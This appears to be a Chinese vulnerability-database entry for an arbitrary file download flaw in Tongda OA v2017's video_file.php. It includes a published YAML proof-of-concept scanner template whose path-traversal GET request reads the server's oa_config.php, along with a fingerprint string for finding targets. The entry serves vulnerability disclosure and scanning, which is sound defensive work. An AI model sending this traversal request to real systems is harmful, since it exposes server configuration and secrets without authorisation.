tongda-v2017-video-file-file-read: 通达OA v2017 video_file.php 任意文件下载漏洞

日期: 2025-09-01 | 影响软件: 通达OA v2017 | POC: 已公开

漏洞描述

通达OA v2017 video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件 app="TDXK-通达OA"

PoC代码[已公开]

id: tongda-v2017-video-file-file-read

info:
  name: 通达OA v2017 video_file.php 任意文件下载漏洞
  author: zan8in
  severity: high
  verified: true
  description: |
    通达OA v2017 video_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件
    app="TDXK-通达OA"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20video_file.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
    expression: response.status == 200 && response.body.bcontains(b'$ROOT_PATH') && response.body.bcontains(b'$ATTACH_PATH')
expression: r0()

相关漏洞推荐